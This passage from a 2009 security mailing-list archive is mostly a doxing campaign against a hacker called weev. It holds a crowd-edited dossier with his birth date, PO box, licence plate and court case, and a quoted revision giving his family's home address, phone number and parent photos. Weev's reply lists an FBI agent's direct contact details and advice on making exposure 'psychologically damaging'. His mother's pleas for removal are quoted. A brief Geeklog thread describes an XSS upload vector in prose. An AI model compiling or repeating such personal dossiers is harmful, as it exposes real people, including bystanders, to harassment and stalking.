we knew died long ago. Hope does spring eternal and sometimes I dream the real Andrew is home and we are all together, but my hopes are waning.? Who knows, the future is never certain. I have been referred to an FBI agent who is involved with the cyber crimes division. I will forward this email to her tomorrow. Again, please don't make my younger children suffer any more. Do what you will with Andrew, he's earned it, but please let our family try to move on. We have been dealing with this for years. Sincerely, Alyse Auernheimer From mrxisaplant at hush.com Mon Oct 5 01:01:23 2009 From: mrxisaplant at hush.com (TheLearner) Date: Mon, 05 Oct 2009 00:01:23 +0000 Subject: [Full-disclosure] Take it from weev's mom. Message-ID: <20091005000123.B98E6B00B5@smtp.hushmail.com> So weev, the psychopath who takes pleasure in ruining the lives of innocents came from a diverse, caring, liberal family. Apparently it was an error to bring the family into this, but if we didn't post their info we'd never know the truth about weev's upbringing. I personally still believe weev needs to be behind bars for a few decades. Let's face it, the internet will be a safer place with this kid off the streets. http://tips.fbi.gov make it happen. On Sun, 04 Oct 2009 20:28:45 +0000 GOBBLES wrote: >Remember, n3td3v always has the absolute finest in intelligence. > >-------- Original Message -------- >From: Alyse Auernheimer >To: fyodor at insecure.org, gobbles1337 at Safe-mail.net >Subject: RE: So Weev... >Date: Sat, 3 Oct 2009 02:28:54 -0400 > >Mr. Lyon, Paul > >There is a thread on your website referencing my son Andrew >Auernheimer. I am totally sympathetic with those posting as my son >is guilty of horrible behavior. We are ashamed of him and wish we >could find him ourselves. Sadly, your contributors felt the need >to "Out" our family, Andrew's parents and siblings. There are >links to our younger children, one of whom is only 14, our address? > and phone numbers are available, photos of the children and one >reference by one poster as to a desire to rape me. The truth is >everyone we know already knows we have a mentally ill child. We >have made no secret of Andrew. > >We too are victims of Andrew. The hardest part for all of us is >that he used to be normal. He loved us and was sweet and kind to >his siblings. Several years ago he developed a relationship with a >girl with a serious drug problem. He began by using xtc regularly >and eventually graduated to LSD and heroin. About three years ago >he had a mental breakdown and began hearing voices and talking to >himself. He vanished from our lives. My children would log into >AIM to see if he was still alive; if he was logged on too long? or >not recently they would worry something had happened to him. There >are references to his lavish lifestyle on this thread but the sad >truth is he is paranoid schizophrenic and has been homeless a >number of times. I am not excusing his pathetic behavior. My >husband and I contacted law enforcement in Southern California >almost a year ago as we wanted to try to "catch him" and have him >forcibly committed; he needs help. Unfortunately we were told that >the likely outcome would be 72 hours in a mental facility and they >would let him go and since we are in no financial position to pay >for mental health care for him we should just pray and forget it. >I cried every night for a year but I am done crying. I can only >worry about things that I can change and I really have NO >information about Andrew. He never once gave us a phone number or >address where we could reach him. When he left here he did not >have a car or a license. I don't even know what state he might be >in and frankly, I don't know if I want to anymore. > >I don't know if any of you have ever had a mentally ill family >member. It is torture. For it to be your child is indescribably >painful.? I sometimes wonder if? because our lives as a family >have been dedicated to diversity and inclusion, that he may have >chosen his weapons to purposely hurt us. We are tough though and >committed to each other and making the most positive contributions >to our world as we are able. > >I hope you all can find it in your hearts to please take down our >personal information. If your goal is to hurt US then you have >succeeded. Other than that I am not sure what the purpose of all >this was. I don't cry over Andrew anymore but I found this thread >when I googled my daughter looking for a school picture for her >dorm room and I sobbed. She has never said an unkind word to >anyone and I knew she would be devastated. We are not responsible >for Andrew's totally screwed up life, he is. I was contacted >erroneously on my Facebook page by someone named Anton Garcia >posing as a Dreamworks Animation Employee trying to find Andrew >because he was hacking Dreamworks. I suspected it was fake but I >answered anyway, truthfully. I too want him to own up to his >stupid behavior and take the consequences like a man. I'm sure I >will be disappointed. The worst part about this is you ONLY hurt >us. Andrew probably thought it was hilarious. He doesn't care what >you say or do to us, he only cares about himself. He, in the past, >has even made up a variety of ugly lies about us, but he is always >found out. > >Many of the postings referred to our family as nice. This is >accurate. Our other children are everything Andrew rejected, kind, >smart, hard-working, dedicated to making a difference through >public service, and we have left Andrew behind. There is so much >need in this world and so little time that spending it on tears >and regret is a colossal waste. Don't get me wrong we will always >love Andrew and our hearts will forever be broken where he is >concerned but what else can we do but move on. It's like the >Andrew we knew died long ago. Hope does spring eternal and >sometimes I dream the real Andrew is home and we are all together, >but my hopes are waning.? Who knows, the future is never certain. >I have been referred to an FBI agent who is involved with the >cyber crimes division. I will forward this email to her tomorrow. > >Again, please don't make my younger children suffer any more. Do >what you will with Andrew, he's earned it, but please let our >family try to move on. We have been dealing with this for years. > >Sincerely, >Alyse Auernheimer > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ From gobbles1337 at Safe-mail.net Mon Oct 5 01:14:25 2009 From: gobbles1337 at Safe-mail.net (GOBBLES) Date: Sun, 4 Oct 2009 20:14:25 -0400 Subject: [Full-disclosure] Weev, AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #1] Message-ID: Mr. Auernheimer, That's true. I'm not a hacker. Also, sorry for not clarifying that I use mrxisaplant too. Here is more correspondance received from your mom (added paragraph breaks): Actually, Andrew has no relationship to designadventures or sealpac. Years ago before sealpac came the US market, Andrew grabbed the domain name (before we knew anything about his mental issues). We want it back. We didn't even remember until this week that his name was on it as we paid for several years in advance and the recent renewal was paid by credit card. Design Adventures is my little interior design business-never had a thing to do with Andrew. Design Adventures and Sealpac have nothing to do with Andrew and have never done business with Andrew. In fact, even as parents we have never financially supported him since he left home. Years ago our communication with him was come home, get help, go to school and we will then and only then support you. He refused. Andrew was never abused or neglected. When he lived with us he was a totally different person, prior to his substance abuse issues. He became a different person in Cal. He had to get as far away from us as he could to participate in this kind of behavior because we would have called the cops and kicked his ass to the curb. From his postings he is deranged and a drug addict. We are not asking for sympathy for him. Andrew has been detained by the FBI twice this year? They didn't do anything?!@#!!! I don't know what the strategy should be for you or I if the FBI won't do anything to stop him and we can't find him. You don't want to call the FBI and we don't care if you do, if they need to they will contact you. Andrew's name has been available online for years so it never even occurred to me to disclose his name but I also spoke to law enforcement a year ago so even they knew. There are so many crazies on the web just like Andrew and we simply stopped trying with him when he went to California years ago. He would not give us his address or location. Truthfully, until about a year ago we didn't even know about this ugly, racist rhetoric because we weren't wasting our days looking. Many years ago he was online railing against Bill O'Reilly and the far right and saying anything to inflame. He used to be a radical liberal. I think he is so crazy now that he might be convinced that martians are ruining his life, not Jews. He's nuts. Sadly he is not alone. I could not believe, when I finally got wind of his livejournal, how many people were posting horrible things in agreement. I felt physically sick. All of those people are also a danger and who knows who those people are. They were smart enough to not post their own photos and link their real names to their ugly words. They may be more of a danger because we don't know who they are. -------- Original Message -------- From: Andrew A To: GOBBLES Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Weev, AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #1] Date: Sun, 4 Oct 2009 12:33:13 -0500 > Mr. Learner, > > You really are hilarious. I can infer one thing from your posts: you aren't a hacker, and you find this really awkward and aren't sure how this whole ruin thing works. > > You have no access to data that I have not made public. Once again, the only thing you found out was my name, which I put on my livejournal. Big deal. The rest was google-able. You really don't have anything. You also don't understand how to make this whole doxdrop deal effective and dramatic. You save up everything you can until you find a piece of data which is psychologically damaging to the target. You have to essentially find them guilty of wrongdoing, like using a nonprofit to defraud people, or sucking dicks for money. This whole thing where you post somebody's parents address, big deal. Everybody's got parents unless they're orphaned. Those parents inevitably live somewhere. If I were a basement dwelling loser, this tactic might be effective. Unfortunately I live on 60 acres in the sticks and have hungry dogs and guns. Not much you can do to me. > > Since you are so fucking inept that you can't even find my birthday: September 1st, 1985 > My former school: James Madison University > > Protip: Nobody in the FBI takes internet submitted tips seriously. If you want to go submit leads to the FBI, you can do it directly to the FBI agent out to get me. > > Craig G. Mueller > Special Agent > Ph: (503) 552 5473 > Fa: (503) 552 5327 > craig.mueller at ic.fbi.gov > > I have attached a photo of his business card as well, for your personal verification and convenience. > > Earlier you called for my "methods of alluding law enforcement." (sic; You make so many errors in your English that it becomes hilariously obvious that all your sockpuppets are the same person.) I've got some funny logs to give you when you've exhausted your effort. You're going to LOL. > > On Sun, Oct 4, 2009 at 1:36 AM, GOBBLES wrote: > > > > One that that struck me as ironic about Encyclopedia Dramatica and Sherrod DeGrippo ordering hits on people who get a rise on her, she wants hard revenge. For a person who runs a site that makes embarrassing nightmares come true, she sure can't stand much heat herself. She took the GNAA phreaking her, and ended up becoming no better than the people who spooked her. > > > > Thing is, she's hiding behind a federal law as a portal provider. Isn't their an exception is when the owner's participates in the content environment? > > > > She also plays the shell game with Joseph Evers. And you don't know whether she's lying and handing out logs to law enforcement without subpoena's (informing for cash, she's jobless besides selling shirts, which can't even pay the server bills let alone a mortgage). Regardless, this doesn't make her immune to civil torts. She probably has some fat ass pockets from being on some corrupt fed's payroll. Sickening. > > > > Randi Harper is an example of how Sherrod DeGrippo, owner of Encyclopedia Dramatica, exhibits control on the flow of the website's informatoin. > > > > In a sense, if an attorney was able to muster it up proof, the safe harbor "Shields" of girlvinyl's space ship may have an opening in them. If these shields were to go down, this site would just be hammered. ED wasn't an LLC since a years or so ago, so it was still someone's site... > > > > Just saying. > > > > http://encyclopediadramatica.com/index.php/Sektie > > Archive: http://www.webcitation.org/5kGadccIg > > > > This lawless libertarian hellhole has got to end here. Looks like a darkmarket for trolls. Whatever the case, it encourages mean-spiritedness and is almost traumatic in the culture it fosters. Its almost like the projects, it draws in the worst crowd, and even if she is snitching, she's keeping the info up while people suffer. > > > > > > -------- Original Message -------- > > From: "TheLearner" > > Apparently from: full-disclosure-bounces at lists.grok.org.uk > > To: full-disclosure at lists.grok.org.uk > > Subject: [Full-disclosure] Weev,AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #1] > > Date: Sun, 04 Oct 2009 01:37:51 +0000 > > > > > Eyeballing Weev, An informative dossier. > > > ============================= > > > By FeelTheBurn Udmncrmnl > > > > > > Version > > > ============================= > > > Revision #1 > > > > > > Purpose > > > ============================= > > > You can edit this document and submit it back as a new revision. > > > > > > An effort by community citizens to expose this person. If you > > > have any helpful knowledge about weev (even general) and have > > > something to add, please reply with any editions. > > > > > > Abstract > > > ============================= > > > I noticed seclists.org was taking down information relating to the > > > "doxing" of Andrew Auernheimer. > > > - Original post > > > http://seclists.org/fulldisclosure/2009/Oct/0013.html > > > - Mirror (http://www.webcitation.org/5kD6O0OEd) > > > > > > Andrew is a troll in his early 20's who has hacked into various > > > websites, harasses innocent people and companies, and actually > > > dropped dox on this very list. Some of his victims (Which are on a > > > list too long for even his associates to remember in entirity) > > > consist of Rob Levin, Rich Kyanka's (lowtax) and Kathy Sierra's > > > identity theft. Also, at the request of Girlvinyl (Sherrod > > > DeGrippo) weev was able to nail Randi Harper (freebsdgirl) to the > > > wall, still hocking up her name on google to this day. > > > > > > Andrew wants glory. He wants to be in the news. His remedy for > > > distracting attention from his own flaws and ironies is the age-old > > > "blame it on the jews". > > > > > > For him, he doesn't try to use it in a sarcastic way, merely > > > pointing out absurb anti-semitism exists, he uses in this way to > > > say something so extreme any attempt of criticizing him stops. > > > > > > In general, a puppy that wants love, but apparently can't be > > > fixed. A Michael Crook. > > > > > > Real Identity > > > ============================= > > > - First name: Andrew > > > - Last name: Auernheimer (mispelled as Aurenheimer sometimes) > > > - Middle name: Alan Escher > > > - Full name: Andrew Alan Escher Auernheimer > > > > > > DOB > > > ============================= > > > We need this! > > > > > > Past schools > > > ============================= > > > We need this! > > > > > > Known address > > > ============================= > > > Family > > > 2038 W Grace St > > > Richmond, VA 23220 > > > > > > Criminal / 0day / Spam / Scam > > > PO Box 61359 > > > Sunnyvale, CA 94088 > > > > > > San Francisco, Los Angeles areas of California > > > > > > You can google his PO Box address (where he does biz from) and > > > see complaints about fraud. > > > > > > Known Aliases > > > ============================= > > > - Weev > > > - Wbeelsoi > > > - Uchiha Weevlos > > > - Weevlar > > > - Andrew wbeelsoi > > > - Andrew weevlos > > > - The iProhet > > > - TheiProphet > > > - The-iProphet > > > > > > Known Affiliations > > > ============================= > > > - Bantown > > > - Buttes > > > - EFnet #down > > > - SASS (Something Awful Sycophant Squad) > > > - Encyclopedia Dramatica > > > - SealPac > > > > > > Known Enemies > > > ============================= > > > Organizations: > > > - Something Awful > > > - FBI > > > - JDL > > > - Possibly banks > > > - Any law enforcement agency he knows him > > > - Any jewish civil rights group that knows him > > > > > > (Know more? http://tips.fbi.gov) > > > > > > Name: > > > - Dennis Fetcho > > > - Kathy Sierra > > > - Rob Levin > > > - Richard Kyanka (lowtax) > > > - FreeBSDGirl > > > > > > Known business affiliations > > > ============================= > > > Sealpac. Richmond, VA > > > > > > Photo > > > ============================= > > > - > > > http://img.waffleimages.com/239fb622e4e5188627f39af8045575a70182f8c7 > > > /569px-Internet_business.jpg / > > > > > http://img8.imageshack.us/img8/7586/569pxinternetbusiness.jpg / > > > > > http://imgur.com/V5hkG.jpg > > > > > > Known publicity stunts > > > ============================= > > > - Toorcon2111, Cybercrime > > > Full URL: http://video.google.com/videoplay?docid=- > > > 5643217366887354926&ei=iOzHSvzBOpbWrQKvlu2KDg&q=andrew+wbeelsoi > > > TinyURL: http://tinyurl.com/auernheimercrime > > > - LiveJournal hacking > > > - NYTimes "Mawebulence" Expose > > > Full URL: http://www.nytimes.com/2008/08/03/magazine/03trolls- > > > t.html?_r=1&hp&oref=slogin > > > Tiny URL: http://tinyurl.com/auernheimernytimes > > > - He is also taking credit for Amazon hack of 2009. However this > > > has not been confirmed > > > - Corrupt: www.corrupt.org/act/interviews/weev > > > - Public naming by JewishReview > > > Full URL: http://www.jewishreview.org/local/Police-question- > > > two-men-about-threats-to-Jewish-community > > > TinyURL: http://tinyurl.com/auernheimer > > > Archival: http://www.webcitation.org/5jnPBPyHG > > > Family > > > =================== > > > Phone number: (804) 355-2889 > > > > > > Mother > > > - Name: Catherine Auernheimer > > > - Affiilations: Richmond PTA, Democratic Party > > > - Alias: Alyse > > > - Photograph: http://imgur.com/AQpSd.jpg / > > > (http://img19.imageshack.us/img19/1967/aqpsd.jpg) / > > > (http://img.waffleimages.com/41c1f9036d350871dbedf177ffd1109cf3bc6ab > > > 8/aqpsd.jpg) / (http://hosting11.imagecross.com/image-hosting-th- > > > 16/953aqpsd.jpg) / > > > (http://www.freeimagehosting.net/uploads/af64fe986f.jpg) / > > > (http://www.uploadgeek.com/thumb-CA81_4AC55843.jpg) / > > > (http://www.imagehuge.com/out.php/t16155_aqpsd.jpg) / > > > (http://images.imagenonline.com/img_a190867.jpg) / > > > (http://www.desiupload.com/out.php/t325733_aqpsd.jpg) > > > > > > Father > > > - Name: Mark Auernheimer > > > - Affiliations: SealPac > > > - Photograph: http://imgur.com/CEaNX.jpg / > > > (http://img19.imageshack.us/img19/4673/ceanx.jpg) / > > > (http://img.waffleimages.com/35414c5ec9e246bd42f2e4372abe51f836ed686 > > > 7/ceanx.jpg) / (http://www.uploadgeek.com/thumb-A304_4AC5594B.jpg) > > > / (http://www.freeimagehosting.net/uploads/6db22e9e83.jpg) / > > > (http://hosting11.imagecross.com/image-hosting-th-16/6430dad.jpg) / > > > (http://www.desiupload.com/out.php/t325734_dad.jpg) / > > > (http://www.imagehuge.com/out.php/i16156_dad.jpg) / > > > (http://images.imagenonline.com/img_a190870.jpg) > > > > > > Not posting name or pictures of the brother and sister in law > > > again. > > > > > > Other pertinent information > > > =============================- > > > Meltdown post after his public naming: > > > - Source: http://weev.livejournal.com/368013.html > > > - Archival: http://www.webcitation.org/5jnP71qsD > > > > > > Also weev posts his IRL name+handle on > > > - > > > http://www.jimgilliam.com/2004/08/oreillys_smear_campaign_in_quickti > > > me.php. > > > - Archival: http://www.webcitation.org/5jnPc0pNy > > > > > > http://whois.domaintools.com/sealpac-usa.com > > > - Archival: http://www.webcitation.org/5jnT7EULI > > > - Related to http://www.sealpacusa.com? > > > > > > Weev online > > > ============================== > > > - http://www.encyclopediadramatica.com/index.php/weev > > > - http://weev.livejournal.com > > > - http://the-iprophet.org > > > - http://theiprophet.blip.tv > > > - http://www.weev.net > > > > > > Email > > > ============================= > > > - gluttony at gmail.com > > > > > > Legal Notice > > > ============================= > > > - http://tips.fbi.gov > > > > > > You don't have to give your identity if you don't want to (even > > > if you're a victim). You have a right to an attorney if you wish to > > > speak with them above weev. If you don't want them to know your > > > linkage with weev, send anonymous tip + some form of evidence (best > > > you can muster) to substantiate the lead > > > > > > Licensing > > > ============================= > > > This document is licensed under the GFDL. Open source > > > intelligence. > > > http://www.gnu.org/copyleft/fdl.html > > > > > > History > > > ============================= > > > 10 / 3 / 2009 - Initial revision by GOBBLES Security > > > > > > _______________________________________________ > > > > > > > Full-Disclosure - We believe in it. > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091004/a54f8d41/attachment-0001.html From mrxisaplant at hush.com Mon Oct 5 04:11:06 2009 From: mrxisaplant at hush.com (TheLearner) Date: Mon, 05 Oct 2009 03:11:06 +0000 Subject: [Full-disclosure] Weev, AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #3] Message-ID: <20091005031106.EA44528039@smtp.hushmail.com> Eyeballing Weev, An informative dossier. ============================= By Lisa Simpson Version ============================= Revision #3 Purpose ============================= You can edit this document and submit it back as a new revision. An effort by community citizens to expose this person. If you have any helpful knowledge about weev (even general) and have something to add, please reply with any editions. Abstract ============================= Andrew "Weev" is a troll in his early 20's who has hacked into various websites, harasses innocent people and companies, and actually dropped dox on this very list. He's been covered in a NYTimes article on cyberharassment and a WST online blog post about a job he claims to have done on amazon. According to our contact with his mother Andrew used to live a quiet life in Richmond, VA. Described as perfectly kind and supportive of his brother and sister. But he began a life of drugs, starting with ecstacy and moving up to heroin. His former girlfriend was a user. He left to SoCal with no car or phone number given to family. His parents tried to have him involuntary committed. It is said in his NYTimes article that he is a wealthy cyber- criminal. In reality, he's nothing more than a nomadic schizo- phrenic with nothing better to do than reak havoc of the lives of innocents. Some of his victims (Which are on a list too long for even his associates to remember in entirity) consist of Rob Levin, Rich Kyanka's (lowtax) and Kathy Sierra's identity theft. Also, at the request of Girlvinyl (Sherrod DeGrippo), the owner of encyclopedia dramatica, weev was able to nail Randi Harper (freebsdgirl) to the wall, still hocking up her name on google to this day. Andrew is known for his pathological sense of vanity and narcissism. Every last act he does, he makes special effort to leave his mark economically, reputationally and psychologically in his victims. He wants to be world famous. His remedy for distracting attention from his own flaws and ironies is the age-old "blame it on the jews". For him, he doesn't try to use it in a sarcastic way, merely pointing out absurb anti-semitism exists, he uses in this way to say something so extreme any attempt of criticizing him stops. In general, a puppy that wants love, but apparently can't be fixed. A Michael Crook. Real Identity ============================= - First name: Andrew - Last name: Auernheimer (mispelled as Aurenheimer sometimes) - Middle name: Alan Escher - Full name: Andrew Alan Escher Auernheimer DOB ============================= September 1st, 1985 Past schools ============================= James Madison University Known address ============================= Criminal / 0day / Spam / Scam PO Box 61359 Sunnyvale, CA 94088 60 acres in the sticks with hungry dogs and guns, he claims. San Francisco, Los Angeles areas of California You can google his PO Box address (where he does biz from) and see complaints about fraud. Known Aliases ============================= - Weev - Wbeelsoi - Uchiha Weevlos - Weevlar - Andrew wbeelsoi - Andrew weevlos - The iProhet - TheiProphet - The-iProphet Car ============================= Drives a silver, 2000 Honda Civic License plate 6EFJ814. Most recently smog checked at Auto Chek in Anaheim, CA 2009/01/21, at 3:30 pm. Traffic Violation ============================= http://visionweb.occourts.org/Vision_Public/SearchCase.do case "LH419349". Date of ticket: April 17th, 2009 Details: 22107 VC I Unsafe turn or lane change Disposition: Bail forfeiture (05/28/2009) Auernheimer tried to disguise his identity as Andrew Averngimer Known Affiliations ============================= - Bantown - Buttes - EFnet #down - SASS (Something Awful Sycophant Squad) - Encyclopedia Dramatica Known Enemies ============================= Organizations: - Something Awful - FBI - JDL - Possibly banks - Any law enforcement agency he knows him - Any jewish civil rights group that knows him Name: - Dennis Fetcho (TheFetch) - Kathy Sierra - Rob Levin (Lilo) - Richard Kyanka (lowtax) - Randi Harper (FreeBSDGirl) (Know more? http://tips.fbi.gov) Known business affiliations ============================= Sealpac. Richmond, VA (We're sorting through them as we speak) Photo ============================= - http://img8.imageshack.us/img8/7586/569pxinternetbusiness.jpg - http://imgur.com/V5hkG.jpg Known publicity stunts ============================= - Toorcon2111, Cybercrime Full URL: http://video.google.com/videoplay?docid=- 5643217366887354926&ei=iOzHSvzBOpbWrQKvlu2KDg&q=andrew+wbeelsoi TinyURL: http://tinyurl.com/auernheimercrime - LiveJournal hacking - NYTimes "Mawebulence" Expose Full URL: http://www.nytimes.com/2008/08/03/magazine/03trolls- t.html?_r=1&hp&oref=slogin Tiny URL: http://tinyurl.com/auernheimernytimes - He is also taking credit for Amazon hack of 2009. However this has not been confirmed - Corrupt: www.corrupt.org/act/interviews/weev - Public naming by JewishReview Full URL: http://www.jewishreview.org/local/Police-question- two-men-about-threats-to-Jewish-community TinyURL: http://tinyurl.com/auernheimer Archival: http://www.webcitation.org/5jnPBPyHG Other pertinent information =============================- Meltdown post after his public naming: - Source: http://weev.livejournal.com/368013.html - Archival: http://www.webcitation.org/5jnP71qsD Also weev posts his IRL name+handle on - http://www.jimgilliam.com/2004/08/oreillys_smear_campaign_in_quickti me.php. - Archival: http://www.webcitation.org/5jnPc0pNy Weev online ============================== - http://www.encyclopediadramatica.com/index.php/weev - http://weev.livejournal.com - http://the-iprophet.org - http://theiprophet.blip.tv - http://www.weev.net Email ============================= - gluttony at gmail.com Legal Notice ============================= - http://tips.fbi.gov You don't have to give your identity if you don't want to (even if you're a victim). You have a right to an attorney if you wish to speak with them above weev. If you don't want them to know your linkage with weev, send anonymous tip + some form of evidence (best you can muster) to substantiate the lead Licensing ============================= This document is licensed under the GFDL. Open source intelligence. http://www.gnu.org/copyleft/fdl.html History ============================= 10 / 3 / 2009 - Initial revision by GOBBLES Security 10 / 4 / 2009 - Emails are flooding in. I really can't read through all this mail. Added car info, ticket info, attempted disguise attempt by Andrew. We got a lot more coming, just gotta get a few ends tied. Fixed formatting of names and monikers. 10 / 5 / 2009 - After correspondance with a family member of weev we decided to remove information relating to the family for their privacy. Also removed the business info because it appears Andrew registered the domains and never gave them back. We offer our condolences to weev's family. Edited intro. From underclasslv at gmail.com Mon Oct 5 04:14:07 2009 From: underclasslv at gmail.com (=?Big5?B?sNq95S4=?=) Date: Mon, 5 Oct 2009 11:14:07 +0800 Subject: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload Message-ID: > > >Successful exploitation requires the ability to execute the uploaded JavaScript. > > >The Geeklog Forum program can be used as an attack vector since it does not > >> properly validate many $_GET / $_POST variables. > >Could you give us some more details about these XSS vulnerabilities ? :) >> > >Cause all I see here is a RCE in the admin panel. >> You confirm that there are XSS but we don't have any details about them... >The >easy one is when the forum allows anonymous posts and is configured for >text posts. The anonymous user name is never filtered, so you can put >anything there, including a reference to the javascript uploaded as the >user profile image.. > How about the php flaw? -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091005/ba79e50f/attachment.html From yirimyah at gmail.com Mon Oct 5 04:47:46 2009 From: yirimyah at gmail.com (dramacrat) Date: Mon, 5 Oct 2009 14:47:46 +1100 Subject: [Full-disclosure] Weev, AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #1] In-Reply-To: References: Message-ID: <173d1e2f0910042047n7f2d2ebdw6c96b82e97bfa0ce@mail.gmail.com> So if I'm to understand you correctly, "gobbles 1337", Weev's mother or a family member was searching the family name randomly on Google, came across these threads, did *not* email the list but instead emailed you with a long list of abuse about Weev, within which she did not disclose any information about her own son that you did not know already; despite the fact that as his mother she would surely be privy to such information. She also, if I am to believe your emails, did not disagree with you on any point. You then kindly stripped the email formatting and rather than forwarding the email to the list, pasted it into your own email so that it would seem almost as though *you* wrote these emails! How strange. 2009/10/5 GOBBLES > Mr. Auernheimer, > > That's true. I'm not a hacker. > > Also, sorry for not clarifying that I use mrxisaplant too. > > Here is more correspondance received from your mom (added paragraph > breaks): > > Actually, Andrew has no relationship to designadventures or sealpac. Years > ago before sealpac came the US market, Andrew grabbed the domain name > (before we knew anything about his mental issues). We want it back. We > didn't even remember until this week that his name was on it as we paid for > several years in advance and the recent renewal was paid by credit card. > Design Adventures is my little interior design business-never had a thing > to > do with Andrew. Design Adventures and Sealpac have nothing to do with > Andrew > and have never done business with Andrew. In fact, even as parents we have > never financially supported him since he left home. Years ago our > communication with him was come home, get help, go to school and we will > then and only then support you. He refused. > > Andrew was never abused or neglected. When he lived with us he was a > totally different person, prior to his substance abuse issues. He became a > different person in Cal. He had to get as far away from us as he could to > participate in this kind of behavior because we would have called the cops > and kicked his ass to the curb. > > From his postings he is deranged and a drug addict. We are not asking for > sympathy for him. Andrew has been detained by the FBI twice this year? They > didn't do anything?!@#!!! I don't know what the strategy should be for you > or I if the FBI won't do anything to stop him and we can't find him. > You don't want to call the FBI and we don't care if you do, if they need to > they will contact you. Andrew's name has been available online for years so > it never even occurred to me to disclose his name but I also spoke to law > enforcement a year ago so even they knew. > > There are so many crazies on the > web just like Andrew and we simply stopped trying with him when he went to > California years ago. He would not give us his address or location. > Truthfully, until about a year ago we didn't even know about this ugly, > racist rhetoric because we weren't wasting our days looking. > > Many years ago > he was online railing against Bill O'Reilly and the far right and saying > anything to inflame. He used to be a radical liberal. I think he is so > crazy > now that he might be convinced that martians are ruining his life, not > Jews. > He's nuts. Sadly he is not alone. I could not believe, when I finally got > wind of his livejournal, how many people were posting horrible things in > agreement. I felt physically sick. All of those people are also a danger > and > who knows who those people are. They were smart enough to not post their > own > photos and link their real names to their ugly words. They may be more of a > danger because we don't know who they are. > > > -------- Original Message -------- > From: Andrew A > To: GOBBLES > Cc: full-disclosure at lists.grok.org.uk > Subject: Re: [Full-disclosure] Weev, AKA Andrew Auernheimer [Fullinfo > Doc(TM) revision #1] > Date: Sun, 4 Oct 2009 12:33:13 -0500 > > > Mr. Learner, > > You really are hilarious. I can infer one thing from your posts: you aren't > a hacker, and you find this really awkward and aren't sure how this whole > ruin thing works. > > You have no access to data that I have not made public. Once again, the > only thing you found out was my name, which I put on my livejournal. Big > deal. The rest was google-able. You really don't have anything. You also > don't understand how to make this whole doxdrop deal effective and dramatic. > You save up everything you can until you find a piece of data which is > psychologically damaging to the target. You have to essentially find them > guilty of wrongdoing, like using a nonprofit to defraud people, or sucking > dicks for money. This whole thing where you post somebody's parents address, > big deal. Everybody's got parents unless they're orphaned. Those parents > inevitably live somewhere. If I were a basement dwelling loser, this tactic > might be effective. Unfortunately I live on 60 acres in the sticks and have > hungry dogs and guns. Not much you can do to me. > > Since you are so fucking inept that you can't even find my birthday: > September 1st, 1985 > My former school: James Madison University > > Protip: Nobody in the FBI takes internet submitted tips seriously. If you > want to go submit leads to the FBI, you can do it directly to the FBI agent > out to get me. > > Craig G. Mueller > Special Agent > Ph: (503) 552 5473 > Fa: (503) 552 5327 > craig.mueller at ic.fbi.gov > > I have attached a photo of his business card as well, for your personal > verification and convenience. > > Earlier you called for my "methods of alluding law enforcement." (sic; You > make so many errors in your English that it becomes hilariously obvious that > all your sockpuppets are the same person.) I've got some funny logs to give > you when you've exhausted your effort. You're going to LOL. > > On Sun, Oct 4, 2009 at 1:36 AM, GOBBLES wrote: > >> One that that struck me as ironic about Encyclopedia Dramatica and Sherrod >> DeGrippo ordering hits on people who get a rise on her, she wants hard >> revenge. For a person who runs a site that makes embarrassing nightmares >> come true, she sure can't stand much heat herself. She took the GNAA >> phreaking her, and ended up becoming no better than the people who spooked >> her. >> >> Thing is, she's hiding behind a federal law as a portal provider. Isn't >> their an exception is when the owner's participates in the content >> environment? >> >> She also plays the shell game with Joseph Evers. And you don't know >> whether she's lying and handing out logs to law enforcement without >> subpoena's (informing for cash, she's jobless besides selling shirts, which >> can't even pay the server bills let alone a mortgage). Regardless, this >> doesn't make her immune to civil torts. She probably has some fat ass >> pockets from being on some corrupt fed's payroll. Sickening. >> >> Randi Harper is an example of how Sherrod DeGrippo, owner of Encyclopedia >> Dramatica, exhibits control on the flow of the website's informatoin. >> >> In a sense, if an attorney was able to muster it up proof, the safe harbor >> "Shields" of girlvinyl's space ship may have an opening in them. If these >> shields were to go down, this site would just be hammered. ED wasn't an LLC >> since a years or so ago, so it was still someone's site... >> >> Just saying. >> >> http://encyclopediadramatica.com/index.php/Sektie >> Archive: http://www.webcitation.org/5kGadccIg >> >> This lawless libertarian hellhole has got to end here. Looks like a >> darkmarket for trolls. Whatever the case, it encourages mean-spiritedness >> and is almost traumatic in the culture it fosters. Its almost like the >> projects, it draws in the worst crowd, and even if she is snitching, she's >> keeping the info up while people suffer. >> >> >> -------- Original Message -------- >> From: "TheLearner" >> Apparently from: full-disclosure-bounces at lists.grok.org.uk >> To: full-disclosure at lists.grok.org.uk >> Subject: [Full-disclosure] Weev,AKA Andrew Auernheimer [Fullinfo Doc(TM) >> revision #1] >> Date: Sun, 04 Oct 2009 01:37:51 +0000 >> >> > Eyeballing Weev, An informative dossier. >> > ============================= >> > By FeelTheBurn Udmncrmnl >> > >> > Version >> > ============================= >> > Revision #1 >> > >> > Purpose >> > ============================= >> > You can edit this document and submit it back as a new revision. >> > >> > An effort by community citizens to expose this person. If you >> > have any helpful knowledge about weev (even general) and have >> > something to add, please reply with any editions. >> > >> > Abstract >> > ============================= >> > I noticed seclists.org was taking down information relating to the >> > "doxing" of Andrew Auernheimer. >> > - Original post >> > http://seclists.org/fulldisclosure/2009/Oct/0013.html >> > - Mirror (http://www.webcitation.org/5kD6O0OEd) >> > >> > Andrew is a troll in his early 20's who has hacked into various >> > websites, harasses innocent people and companies, and actually >> > dropped dox on this very list. Some of his 